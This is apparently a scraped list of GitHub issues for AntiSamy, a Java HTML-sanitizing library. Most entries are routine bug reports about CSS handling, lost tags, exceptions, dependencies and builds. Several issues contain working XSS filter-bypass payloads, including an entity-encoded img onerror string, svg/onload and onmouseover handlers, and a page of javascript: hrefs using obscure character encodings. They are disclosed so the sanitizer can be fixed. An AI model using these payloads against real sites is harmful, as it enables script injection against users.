nahsra / antisamy

a library for performing fast, configurable cleansing of HTML coming from untrusted sources

License: BSD 3-Clause "New" or "Revised" License

html javascript xss-filter java-library security-tools

antisamy's Issues

Antisamy changing the benign URL pattern.

I have been using AntiSamy in one of my projects. When I enter a URL such as

https://www.google.com/terms-conditions/vacancy.html and click the save button, the URL is changed to https://www.google.com/ter-ms-conditions/vacancy.html.

That is, terms- is changed to ter-ms-. Please suggest a solution.

!important CSS rule is removed

We started to use AntiSamy for CSS validation in our web project and realized that it removes !important CSS rules from the styles.

E.g. <p style="color: red !important">Some Text</p> resolves to <p style="color: red">Some Text</p>

The following test added to AntiSamyTest fails.

    @Test
    public void givenImportantRuleWhenScanThenPreserved() throws ScanException, PolicyException {
        String s = as.scan("<p style=\"color: red !important\">Some Text</p>", policy, AntiSamy.DOM).getCleanHTML();
        assertTrue(s.contains("!important"));

        s = as.scan("<p style=\"color: red !important\">Some Text</p>", policy, AntiSamy.SAX).getCleanHTML();
        assertTrue(s.contains("!important"));
    }

From the parameters of org.owasp.validator.css.CssHandler#property I can see that the handler is told whether a property is important, but the code appears to ignore this information, as the argument is not used anywhere.

...
public void property(String name, LexicalUnit value, boolean important)
			throws CSSException {
		// only bother validating and building if we are either inline or within
		// a selector tag

		if (!selectorOpen && !isInline) {
...

Is there a way to get it working or am I missing something? Let me know if you need further information!

Thank you in advance!
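
For illustration, here is a minimal sketch of how the important flag could be carried into the serialized declaration. The class and method names are hypothetical and are not part of AntiSamy; only the boolean mirrors the `important` parameter of the `property` signature quoted above.

```java
// Hypothetical helper, not AntiSamy code: shows one way the `important`
// flag passed to a CSS handler's property callback could be preserved.
final class ImportantFlagSketch {

    // Builds "name: value" and appends " !important" only when the flag is set.
    static String declaration(String name, String value, boolean important) {
        StringBuilder sb = new StringBuilder();
        sb.append(name).append(": ").append(value);
        if (important) {
            sb.append(" !important");
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println(declaration("color", "red", true));
        System.out.println(declaration("color", "red", false));
    }
}
```

Whether the real handler should emit the flag unconditionally or only when the policy allows it is a design decision this sketch does not address.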

ArrayIndexOutOfBoundsException

I get the following exception:

javax.xml.transform.TransformerException: java.lang.ArrayIndexOutOfBoundsException: -1
org.owasp.validator.html.ScanException: javax.xml.transform.TransformerException: java.lang.ArrayIndexOutOfBoundsException: -1
	at org.owasp.validator.html.scan.AntiSamySAXScanner.scan(AntiSamySAXScanner.java:135) ~[antisamy-1.5.7.jar:1.5.7]
	at org.owasp.validator.html.AntiSamy.scan(AntiSamy.java:101) ~[antisamy-1.5.7.jar:1.5.7]

when calling:

antiSamy.scan ( "my &test",  antisamypolicy, AntiSamy.SAX ).getCleanHTML (); //used the standard antisamy.xml

onUnknownTag directive causes AntiSamy.scan to lose closing tag

See attached java test class that shows the problem.
Given a Policy that accepts no html, but has <directive onUnknownTag="encode"/>, calling

    AntiSamy.scan("<div>abc</div>", policy);

produces the string <div>abc (without the trailing </div>)
Is this a bug?

package org.yourname;

import static org.hamcrest.CoreMatchers.equalTo;
import static org.junit.Assert.assertThat;

import java.io.InputStream;
import java.io.StringBufferInputStream;

import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.runners.MockitoJUnitRunner;
import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;
import org.owasp.validator.html.PolicyException;
import org.owasp.validator.html.ScanException;


@SuppressWarnings("deprecation")
@RunWith(MockitoJUnitRunner.class)
public class AntiSamyEncodingTest 
{
    @Test
    /**
     * Demonstrates that the onUnknownTag directive causes AntiSamy's scan to
     * lose the closing tag
     * 
     * Given an input like 
     * <pre>
     *   <div>hello, world</div>
     * </pre>
     * scan will return 
     * <pre>
     *   &lt;div&gt;hello, world
     * </pre>
     * without the closing tag.
     */
    public void standaloneTest() throws PolicyException, ScanException 
    {
        String policyDefinition = 
            "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>" +
            "<anti-samy-rules xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" " +
            "                       xsi:noNamespaceSchemaLocation=\"antisamy.xsd\">" +
            "    <directives>" +
            "        <directive name=\"onUnknownTag\" value=\"encode\" />" +
            "     </directives>" +

            "    <common-regexps></common-regexps>" +

            "    <common-attributes></common-attributes>" +
            "    <!-- no tags are valid, by default all html elements are encoded -->" +
            "    <tag-rules></tag-rules>" +
            "</anti-samy-rules>";
                
        InputStream sr = new StringBufferInputStream(policyDefinition);
        AntiSamy as = new AntiSamy();
        Policy policy = Policy.getInstance(sr);
        String taintedHtml = "<div>hello, world</div>";
        CleanResults cr = as.scan(taintedHtml, policy, AntiSamy.SAX);
        String cleaned = cr.getCleanHTML();
        
        // the value is "&lt;div&gt;hello, world", missing the closing element
        assertThat(cleaned, equalTo("&lt;div&gt;hello, world&lt;/div&gt;")); //fails
    }
}

If and only if you agree this is not correct, would be happy to open a PR
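
To make the expected result concrete, here is a small stand-alone sketch that uses only the JDK's SAX parser, not AntiSamy's scanner. The class and method names are hypothetical. It encodes every start tag and every end tag, which is the symmetric behaviour the test above expects; attributes are dropped and text is passed through unchanged to keep the example short.

```java
import java.io.StringReader;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical illustration, not AntiSamy's handler.
final class EncodeUnknownTagSketch {

    // Treats every element as "unknown" and entity-encodes both of its tags.
    static String encodeAllTags(String wellFormedXml) {
        final StringBuilder out = new StringBuilder();
        DefaultHandler handler = new DefaultHandler() {
            @Override
            public void startElement(String uri, String localName, String qName, Attributes atts) {
                out.append("&lt;").append(qName).append("&gt;");
            }

            @Override
            public void endElement(String uri, String localName, String qName) {
                // The closing tag is encoded too; this is the step the issue reports as missing.
                out.append("&lt;/").append(qName).append("&gt;");
            }

            @Override
            public void characters(char[] ch, int start, int length) {
                out.append(ch, start, length);
            }
        };
        try {
            SAXParserFactory.newInstance().newSAXParser()
                    .parse(new InputSource(new StringReader(wellFormedXml)), handler);
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(encodeAllTags("<div>hello, world</div>"));
    }
}
```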

antisamy ignoring anything rule?

I have a rule for an attribute in a tag that looks like this:

<tag name="tag1" action="validate">
    <attribute name="attribute1">
        <regexp-list>
            <regexp name="anything" />
        </regexp-list>
    </attribute>
    <attribute name="attribute2" />
</tag>

When I use the SAX parser, attribute1 is dropped because its value contains an LSEP character. It may also be dropping the filename because of other characters. Either way, shouldn't attribute1 be kept, since its regexp is set to anything?

The specific error message I'm getting is "The tag1 tag contained an attribute that we could not process. The attribute1 attribute had a value of "Gartner - Executive Guide to Total Experience .pdf". This value could not be accepted for security reasons. We have chosen to remove this attribute from the tag and leave everything else in place so that we could process the input."
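
One possible explanation, offered as an assumption rather than a confirmed diagnosis: if the "anything" regexp is defined as `.*`, then in java.util.regex the dot does not match line terminators by default, and U+2028 (LSEP) counts as one. The sketch below uses only the JDK; the class name and the sample value are made up for illustration.

```java
import java.util.regex.Pattern;

// Hypothetical illustration: how ".*" behaves on a value containing U+2028.
final class AnythingRegexSketch {

    // Default mode: '.' excludes line terminators such as \n, \r, U+0085, U+2028, U+2029.
    static boolean matchesDefault(String value) {
        return Pattern.compile(".*").matcher(value).matches();
    }

    // DOTALL mode: '.' matches any character, including line terminators.
    static boolean matchesDotAll(String value) {
        return Pattern.compile(".*", Pattern.DOTALL).matcher(value).matches();
    }

    public static void main(String[] args) {
        String value = "Guide " + (char) 0x2028 + ".pdf"; // sample value with an LSEP inside
        System.out.println("default: " + matchesDefault(value));
        System.out.println("DOTALL:  " + matchesDotAll(value));
    }
}
```

If this is the cause, a pattern that also admits line separators would accept the value; whether that is desirable for the attribute is a policy decision.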

Failed to execute goal org.apache.maven.plugins:maven-javadoc-plugin:3.0.1:jar (attach-javadocs)

Hi,

I just tried to build antisamy on a windows box. I called mvn package and got the following messages.

[ERROR] Failed to execute goal org.apache.maven.plugins:maven-javadoc-plugin:3.0.1:jar (attach-javadocs) on project antisamy: MavenReportException: Error while generating Javadoc:
[ERROR] Exit code: 1 - D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:123: warning: no @param for errorMessages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,
[ERROR]                ^
[ERROR] D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:123: warning: no @param for messages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,
[ERROR]                ^
[ERROR] D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:139: warning: no @param for errorMessages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,
[ERROR]                ^
[ERROR] D:\tmp\antisamy\src\main\java\org\owasp\validator\css\CssHandler.java:139: warning: no @param for messages
[ERROR]         public CssHandler(Policy policy, LinkedList embeddedStyleSheets,

There is no schema validation for policy XML

AntiSamy seems to lack schema validation when loading the XML of a policy.

This may lead to malformed policies that are valid (AntiSamy won't blow up) but do not comply with the XSD. Bugs can originate from bad policy definition, which could be prevented with XML schema validation.

Even the current example policies (and some customized ones in the tests) fail to validate when checked against the XSD.

This is a screenshot of the validation on freeformatter for antisamy-tinymce.xml:

I would suggest applying strict schema validation with the already defined XSD. As an improvement, if requested or considered useful, multiple or "stacked" validation could be applied, seen as an intersection of schemas to restrict policies structure even more.

Add rel="noopener" to anchor if target="_blank" is set => security enhancement

Add rel="noopener" to anchor if target="_blank" is set
Based on the OWASP article
https://owasp.org/www-community/attacks/Reverse_Tabnabbing
it would be nice if the noopener attribute would be set automatically if the target blank attribute is in use.

This is very similar to the nofollow setting in antisamy

Example
<a href="https://example.com" target="_blank"> => <a href="https://example.com" target="_blank" rel="noopener">
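
The requested transformation can be sketched on a plain DOM element as follows. This is a hypothetical helper built on the JDK's org.w3c.dom API, not an existing AntiSamy feature or directive; it appends noopener to any rel value that is already present instead of overwriting it.

```java
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

// Hypothetical helper, not part of AntiSamy.
final class NoopenerSketch {

    // Adds rel="noopener" when target="_blank" is set and noopener is not already listed.
    static void addNoopenerIfBlank(Element anchor) {
        if (!"_blank".equalsIgnoreCase(anchor.getAttribute("target"))) {
            return;
        }
        String rel = anchor.getAttribute("rel").trim(); // "" when the attribute is absent
        for (String token : rel.split("\\s+")) {
            if (token.equalsIgnoreCase("noopener")) {
                return;
            }
        }
        anchor.setAttribute("rel", rel.isEmpty() ? "noopener" : rel + " noopener");
    }

    // Builds a detached <a> element for the demo; null target or rel means "not set".
    static Element anchor(String href, String target, String rel) {
        try {
            Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder().newDocument();
            Element a = doc.createElement("a");
            a.setAttribute("href", href);
            if (target != null) a.setAttribute("target", target);
            if (rel != null) a.setAttribute("rel", rel);
            return a;
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        Element a = anchor("https://example.com", "_blank", null);
        addNoopenerIfBlank(a);
        System.out.println("rel=" + a.getAttribute("rel"));
    }
}
```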

<a/href=javascript:[1].find(alert)>CLICKHERE</a> does not return error

The policy for the a tag is below. The cleaned HTML has the /href attribute removed, but no error is reported. Could you take a look? How can I get an error message for this case?

rev="1.6.3"

Thanks in advance!

         <tag name="a" action="validate">

            <!--  onInvalid="filterTag" has been removed as per suggestion at OWASP SJ 2007 - just "name" is valid -->
            <attribute name="href"/>
            <attribute name="onFocus"/>
            <attribute name="onBlur"/>
            <attribute name="nohref">
                <regexp-list>
                    <regexp name="anything"/>
                </regexp-list>
            </attribute>
            <attribute name="rel">
                <literal-list>
                    <literal value="nofollow"/>
                </literal-list>
            </attribute>
            <attribute name="name"/>


            <attribute name="target">
                <regexp-list>
                    <regexp value="[a-zA-Z0-9\-_\$]+"/>
                </regexp-list>
            </attribute>

        </tag>

Antisamy truncates whole content when frame tag is used in the input and configured frame tag to be removed.

When using AntiSamy with the attached policy file, in which the frame tag is configured to be removed, and providing the input

<frame>remove</frame><div>should not be removed</div>

the output is an empty string instead of

<div>should not be removed</div>

sample code below:

Policy policy = Policy.getInstance("C:\\antisamy-basic.xml");
AntiSamy antisamy = new AntiSamy(policy);
CleanResults cleanResults = antisamy.scan("<frame>remove</frame><div>should not be removed</div>");
System.out.println(cleanResults.getCleanHTML());

We are using antisamy version 1.5.5
antisamy-basic.zip

Antisamy Removes carriage returns and line feeds

andresriancho/owaspantisamy#143

remove httpclient-3.1

Upstream and users want this library out due to known CVE. It's not a realistic threat for AntiSamy use for a couple reasons, but it's harmless to pull it out and replace with the latest.

AntiSamy 1.6.4 doesn't play nicely with xalan-j 2.7.2

This code was added in org.owasp.validator.html.scan.AntiSamySAXScanner:

sTransformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
sTransformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");

Xerces2-j does not support these attribute constants. The Oracle JAXP documentation (https://docs.oracle.com/javase/tutorial/jaxp/properties/usingProps.html) says that it is recommended to catch the IllegalArgumentException for unsupported features.

I know that Xerces is ancient, but there isn't any need to break compatibility in this way.
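
The approach recommended in the JAXP documentation can be sketched as below: attempt to set each attribute and treat IllegalArgumentException as "not supported by this implementation". The class and helper names are hypothetical; only TransformerFactory#setAttribute and the two XMLConstants come from the JDK. This is not the code that was eventually committed to AntiSamy.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.TransformerFactory;

// Hypothetical sketch of tolerant attribute configuration.
final class TransformerAttributeSketch {

    // Returns true if the factory accepted the attribute, false if it does not support it.
    static boolean trySetAttribute(TransformerFactory factory, String name, Object value) {
        try {
            factory.setAttribute(name, value);
            return true;
        } catch (IllegalArgumentException e) {
            // Older or third-party implementations may not recognize the attribute.
            return false;
        }
    }

    // Applies the two restrictions where possible instead of failing outright.
    static TransformerFactory hardenedFactory() {
        TransformerFactory factory = TransformerFactory.newInstance();
        trySetAttribute(factory, XMLConstants.ACCESS_EXTERNAL_DTD, "");
        trySetAttribute(factory, XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return factory;
    }

    public static void main(String[] args) {
        TransformerFactory factory = TransformerFactory.newInstance();
        System.out.println("ACCESS_EXTERNAL_DTD accepted: "
                + trySetAttribute(factory, XMLConstants.ACCESS_EXTERNAL_DTD, ""));
    }
}
```

A caller that needs the restrictions for security reasons may prefer to log or reject when the attribute is refused instead of silently continuing.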

UPDATE: This issue was originally created with Xerces-2 in the title as the offending library, so the thread below talks about Xerces a lot. But the actual problem is with a variant of Xalan in the classpath, and Xerces is a red herring. Way below, Xalan is finally mentioned as the real problem, not Xerces.

Usage of vulnerable commons-httpclient library

Hi,

This library has a dependency on the commons-httpclient library which is both end of life and vulnerable. Is it possible to upgrade to its replacement, http://hc.apache.org/httpcomponents-client-ga/index.html?

Thanks,
Geert

Injecting js in "a" tag

I am still able to inject elements such as <a onmouseover=alert(1)>click</a> and <p onmouseover=alert(1)>click</p>, even though I have updated the AntiSamy policy to remove the "a" tag completely.

AntiSamy does not work on <svg/onload = alert('Hello')/>

I am working on an XSS issue where our tester found that input like <svg/onload = alert('Hello') > is not cleaned by AntiSamy.

When I debugged the AntiSamy library, I saw that it treats <svg> or <style> as a tag and continues with the current code, so it does not throw any exception.

I have written a small test case for your reference:

@Test
public void testStyleOnloadWithAlertScripts() throws PolicyException, ScanException {
    assertEquals("", scanner.scan("<style/onload = alert(document.domain)>"));
}

Can anyone look into resolving this issue, either through XML configuration or in a new patch release?

... i think i found a way to bypass ....

If you take

&#x22;&#x3E;&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x61;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3E;

and pass it as the parameter to
antiSamy.scan ( parameter, policy, AntiSamy.SAX ).getCleanHTML ();

you will get ><img src=a onerror=alert(1)> and so an alert pops up, even if img tags are set to remove.

AntiSamy should not be dependent on Xerces

Xerces does not support the attributes on a Transformer that are required in order to mitigate XXE vulnerabilities. While this may not be a huge issue for AntiSamy itself, the fact that we have to include xercesImpl.jar in our application classpath means that xerces is used ahead of the JDK, and therefore our XXE mitigations are useless.

XXE mitigation reference: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#TransformerFactory

Besides all of that: Xerces hasn't been maintained since 2010!

As has been mentioned by others: AntiSamy should be using XSLT to serialize instead of the deprecated HTMLSerializer. As far as I can tell, this is the only direct xerces dependency.

Thanks.

when preserveComments directive is enabled, the HTML comments are moved to the end

I added the preserveComments directive to the config.

I used this input:

<p>this is a test content before start testing</p>
<!-- TESTING COMMENT --><p>another line</p>
<p>end of the content</p>

then after

Policy policy = Policy.getInstance(App.class.getResourceAsStream("/antisamyConfig.xml"));
AntiSamy sanitizer = new AntiSamy(policy); 
CleanResults scanned = sanitizer.scan(input);
String sanitized = scanned.getCleanHTML();

The output was:

<p>this is a test content before start testing</p>
<p>another line</p>
<p>end of the content</p>
<!-- TESTING COMMENT -->

Batik-css-1.8 has high severity vulnerability

Hello,

Using antisamy causes batik-css-1.8.jar to be included as a run-time dependency. There is a high severity CVE against this library: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5662.

batik-1.9 was recently released, which fixes this issue. Is there any chance we could get a new version of antisamy that uses it instead of 1.8? I could open a pull request if you like.

Thanks!

NullPointerException for input string "|<?ai aaa"

The code in question is invoked through the ESAPI library, so I'm not sure whether that has a bearing. But on examining the removePI method of AntiSamyDOMScanner, it looks like the node doesn't have a parent node, so the call involving node.getParentNode() results in a NullPointerException. The stack trace is below.

java.lang.NullPointerException
at org.owasp.validator.html.scan.AntiSamyDOMScanner.removePI(AntiSamyDOMScanner.java:689)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.recursiveValidateTag(AntiSamyDOMScanner.java:260)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.processChildren(AntiSamyDOMScanner.java:675)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.processChildren(AntiSamyDOMScanner.java:666)
at org.owasp.validator.html.scan.AntiSamyDOMScanner.scan(AntiSamyDOMScanner.java:159)
at org.owasp.validator.html.AntiSamy.scan(AntiSamy.java:93)

Performance got degraded after upgrade from 1.5.7 version to 1.5.8 for the SAXScanner.

After upgrading the AntiSamy jar from 1.5.7 to 1.5.8, performance dropped by 40-50%.
Comparing the 1.5.8 code with 1.5.7, I found that in AntiSamySAXScanner the cached item is not added back to the cachedItems queue after scanning completes, so a new CachedItem object is created for every scan call.
Creating this object on every scan is what lowers performance.
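
The pooling pattern described here can be sketched as follows. This is a simplified stand-in, not the AntiSamySAXScanner source: the CachedItem class is empty, the counter exists only to make the effect observable, and the `returnToQueue` switch is a hypothetical knob that toggles between the two behaviours being compared.

```java
import java.util.Queue;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.concurrent.atomic.AtomicInteger;

// Hypothetical sketch of a poll / use / return-to-queue cache.
final class CachedItemPoolSketch {

    static final class CachedItem { } // stands in for expensive-to-create scanner state

    private final Queue<CachedItem> cachedItems = new ConcurrentLinkedQueue<CachedItem>();
    private final AtomicInteger created = new AtomicInteger();
    private final boolean returnToQueue;

    CachedItemPoolSketch(boolean returnToQueue) {
        this.returnToQueue = returnToQueue;
    }

    void scan() {
        CachedItem item = cachedItems.poll();
        if (item == null) {
            item = new CachedItem();      // cache miss: pay the creation cost
            created.incrementAndGet();
        }
        try {
            // ... the real scanning work would use `item` here ...
        } finally {
            if (returnToQueue) {
                cachedItems.add(item);    // without this step every scan is a cache miss
            }
        }
    }

    // Runs `scans` sequential scans and reports how many items had to be created.
    static int createdAfterScans(boolean returnToQueue, int scans) {
        CachedItemPoolSketch pool = new CachedItemPoolSketch(returnToQueue);
        for (int i = 0; i < scans; i++) {
            pool.scan();
        }
        return pool.created.get();
    }

    public static void main(String[] args) {
        System.out.println("with return:    " + createdAfterScans(true, 3));
        System.out.println("without return: " + createdAfterScans(false, 3));
    }
}
```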

stripNonValidXMLCharacters doesn't work with HTML where html.length() > 1

It looks like somewhere around version 1.5 the method org.owasp.validator.html.scan.AntiSamyDOMScanner#stripNonValidXMLCharacters was altered to first check the invalidXmlCharacters Pattern with java.util.regex.Matcher#matches().
I presume that was done for efficiency, to skip the replaceAll call when the input String does not need to be changed.
You use the same technique in a test to check whether there are time improvements.

I believe it should use java.util.regex.Matcher#find() instead.

matches() checks if the entire sequence matches the pattern. Since the pattern represents only a single character, in effect, that can be in one of the defined sets, then if the sequence (the HTML) is longer than 1 character it can never match. It's been this way since forever I believe, at least Java 5.

find() will find the next subsequence that matches the pattern, in effect checking quickly and succeeding fast if the HTML needs to be cleansed.

You're getting a speed increase because matches() is getting to the second char and declaring the sequence as a non-match regardless.
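
The difference between the two calls can be shown with a stand-alone sketch. The pattern below is an illustrative single-character class of control characters, chosen for this example; it is an assumption and not AntiSamy's actual invalidXmlCharacters pattern. The class and method names are also hypothetical.

```java
import java.util.regex.Pattern;

// Hypothetical illustration of guarding replaceAll with matches() versus find().
final class MatchesVsFindSketch {

    // Illustrative pattern only: a handful of C0 control characters.
    static final Pattern INVALID =
            Pattern.compile("[\\u0000-\\u0008\\u000B\\u000C\\u000E-\\u001F]");

    // Guard with matches(): only true when the WHOLE input is one invalid character.
    static String stripUsingMatches(String in) {
        return INVALID.matcher(in).matches() ? INVALID.matcher(in).replaceAll("") : in;
    }

    // Guard with find(): true as soon as any invalid character occurs anywhere.
    static String stripUsingFind(String in) {
        return INVALID.matcher(in).find() ? INVALID.matcher(in).replaceAll("") : in;
    }

    public static void main(String[] args) {
        String html = "<div>Hello" + (char) 1 + "</div>";
        System.out.println(stripUsingMatches(html).equals(html)); // input left untouched
        System.out.println(stripUsingFind(html));                 // control character removed
    }
}
```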

Input HTML:
<div>Hello\uD83D\uDC95</div>

Expected on org.owasp.validator.html.CleanResults#getCleanHTML :
<div>Hello</div>

Actual:
<div>Hello\uD83D\uDC95</div>

Where input HTML is single character \uD888 only then the output is the empty string as expected.

I looked through the test class here and can see no tests where you are expecting data to be cleansed. All the tests ensure that characters make it through ok or that something is faster (checking only 1 char is faster!)

Incidentally, I only noticed this because the AntiSamy code appeared to want to strip the characters that make up an emoji, even though, as far as I can tell, that character is valid under the XML and HTML specs. When our system reads its UTF-8 bytes, Java represents it as 16-bit chars in the String, and those char values fall within your filter. I don't believe they should be stripped when they occur together: java.lang.Character#isSurrogatePair returns true for \uD83D and \uDC95, and toCodePoint reports the code point as &#128149;. So I think the checks in this method ought to be more complex.
Ironically, if the code in this method worked as intended, these characters would have been stripped. But they weren't.

I believe you could get manipulative code points through now, because of this. But I can't be certain as I'm looking purely from a data cleansing point of view.
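
A more careful check along the lines suggested above might walk the string by code point, keeping valid surrogate pairs and dropping only unpaired surrogates. The sketch below is one hypothetical way to do that with JDK calls only; it is not the fix adopted by the project, and it deliberately ignores the other character ranges the real method filters.

```java
// Hypothetical sketch: strip unpaired surrogates, keep valid pairs such as emoji.
final class SurrogateAwareStripSketch {

    static String stripLoneSurrogates(String in) {
        StringBuilder out = new StringBuilder(in.length());
        int i = 0;
        while (i < in.length()) {
            int cp = in.codePointAt(i);            // combines a valid pair into one code point
            int width = Character.charCount(cp);   // 2 for a pair, otherwise 1
            // codePointAt returns the surrogate itself when it is not part of a valid pair.
            boolean loneSurrogate = width == 1 && Character.isSurrogate((char) cp);
            if (!loneSurrogate) {
                out.appendCodePoint(cp);
            }
            i += width;
        }
        return out.toString();
    }

    public static void main(String[] args) {
        char high = '\uD83D';
        char low = '\uDC95';
        System.out.println(Character.isSurrogatePair(high, low));
        System.out.println(Character.toCodePoint(high, low));
        System.out.println(stripLoneSurrogates("\uD888").isEmpty());
    }
}
```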

test

Filter Bypasses

The markup below shows multiple ways to bypass the AntiSamy filter.

The list under the NOT Sanitized by AntiSamy shows a couple Javascript payloads that browsers execute (tested with Chrome 69), but won't be removed by AntiSamy.
The list under the Sanitized by AntiSamy heading is sanitized correctly and just left here as a recommendation for tests.
The list under the Tricky Encoding with Ampersand Encoding was created by taking one of the payloads under NOT Sanitized by AntiSamy and encoding all encountered ampersands, using different ways to encode an ampersand. One could repeat this process for any payload under NOT Sanitized by AntiSamy.

<html>
  <head>
    <title>Test</title>
  </head>
  <body>
    <h1>Tricky Encoding</h1>
    <h2>NOT Sanitized by AntiSamy</h2>
    <ol>
      <li><a href="javascript&#00058x=alert,x%281%29">X&#00058;x</a></li>
      <li><a href="javascript&#00058y=alert,y%281%29">X&#00058;y</a></li>

      <li><a href="javascript&#58x=alert,x%281%29">X&#58;x</a></li>
      <li><a href="javascript&#58y=alert,y%281%29">X&#58;y</a></li>

      <li><a href="javascript&#x0003Ax=alert,x%281%29">X&#x0003A;x</a></li>
      <li><a href="javascript&#x0003Ay=alert,y%281%29">X&#x0003A;y</a></li>

      <li><a href="javascript&#x3Ax=alert,x%281%29">X&#x3A;x</a></li>
      <li><a href="javascript&#x3Ay=alert,y%281%29">X&#x3A;y</a></li>
    </ol>
    <h2>Sanitized by AntiSamy</h2>
    <ol>
      <li><a href="javascript&#00058;alert&lpar;1&rpar;">X&#00058;</a></li>
      <li><a href="javascript&#58;alert&lpar;1&rpar;">X&#58;</a></li>

      <li><a href="javascript&#x0003A;alert&lpar;1&rpar;">X&#x0003A;</a></li>
      <li><a href="javascript&#x3A;alert&lpar;1&rpar;">X&#x3A;</a></li>

      <li><a href="javascript&colon;alert&lpar;1&rpar;">X&colon;</a></li>
    </ol>

    <h1>Tricky Encoding with Ampersand Encoding</h1>
    <p>AntiSamy turns harmless payload into XSS by just decoding the encoded ampersands in the href attribute</p>
    <ol>
      <li><a href="javascript&amp;#x3Ax=alert,x%281%29">X&amp;#x3A;x</a></li>
      <li><a href="javascript&AMP;#x3Ax=alert,x%281%29">X&AMP;#x3A;x</a></li>

      <li><a href="javascript&#38;#x3Ax=alert,x%281%29">X&#38;#x3A;x</a></li>
      <li><a href="javascript&#00038;#x3Ax=alert,x%281%29">X&#00038;#x3A;x</a></li>

      <li><a href="javascript&#x26;#x3Ax=alert,x%281%29">X&#x26;#x3A;x</a></li>
      <li><a href="javascript&#x00026;#x3Ax=alert,x%281%29">X&#x00026;#x3A;x</a></li>
    </ol>
    <p><a href="javascript&#x3Ax=alert,x%281%29">Original without ampersand encoding</a></p>
  </body>
</html>
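
To see why these payloads matter, the sketch below decodes numeric character references leniently, accepting them with or without the trailing semicolon. It is a simplified illustration written for this example, not a full HTML entity decoder and not AntiSamy code. It shows that `&#58x` yields `:x`, and that an encoded ampersand needs only one extra decoding pass to produce the same result.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical illustration of lenient numeric character reference decoding.
final class LenientEntityDecodeSketch {

    // &#DDDD or &#xHHHH, with the trailing semicolon optional.
    private static final Pattern NCR =
            Pattern.compile("&#(?:[xX]([0-9A-Fa-f]{1,6})|([0-9]{1,7}));?");

    // Performs a single decoding pass over the input.
    static String decodeNumericRefs(String in) {
        Matcher m = NCR.matcher(in);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            int cp = m.group(1) != null
                    ? Integer.parseInt(m.group(1), 16)
                    : Integer.parseInt(m.group(2), 10);
            // Leave the reference untouched if it does not name a valid code point.
            String replacement = Character.isValidCodePoint(cp)
                    ? new String(Character.toChars(cp))
                    : m.group();
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(decodeNumericRefs("javascript&#58x=alert,x%281%29"));
        String once = decodeNumericRefs("javascript&#38;#x3Ax=alert,x%281%29");
        System.out.println(once);
        System.out.println(decodeNumericRefs(once));
    }
}
```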

Test build failed in Java 7

Environment

windows jdk-7 maven 3.8.1 antisamy 1.6.4

Steps to reproduce

mvn test / mvn package

What is expected?

Success

What is actually happening?

......
[ERROR] Tests run: 14, Failures: 0, Errors: 1, Skipped: 0, Time elapsed: 0.11 s <<< FAILURE! - in org.owasp.validator.html.test.PolicyTest
[ERROR] org.owasp.validator.html.test.PolicyTest.testGithubIssue79  Time elapsed: 0 s  <<< ERROR!
java.lang.UnsupportedClassVersionError: org/owasp/antisamy/test/Dummy : Unsupported major.minor version 52.0
        at org.owasp.validator.html.test.PolicyTest.testGithubIssue79(PolicyTest.java:341)

[INFO] Results:
[INFO]
[ERROR] Errors:
[ERROR]   PolicyTest.testGithubIssue79:341 ? UnsupportedClassVersion org/owasp/antisamy/...
[INFO]
[ERROR] Tests run: 93, Failures: 0, Errors: 1, Skipped: 0
[INFO]
[INFO] ------------------------------------------------------------------------
[INFO] BUILD FAILURE
[INFO] -----------------------------------------------------------
......

and

......
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-enforcer-plugin/3.0.0-M3/maven-enforcer-plugin-3.0.0-M3.pom
[INFO] ------------------------------------------------------------------------
[INFO] BUILD FAILURE
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  0.939 s
[INFO] Finished at: 2021-08-04T10:35:20+08:00
[INFO] ------------------------------------------------------------------------
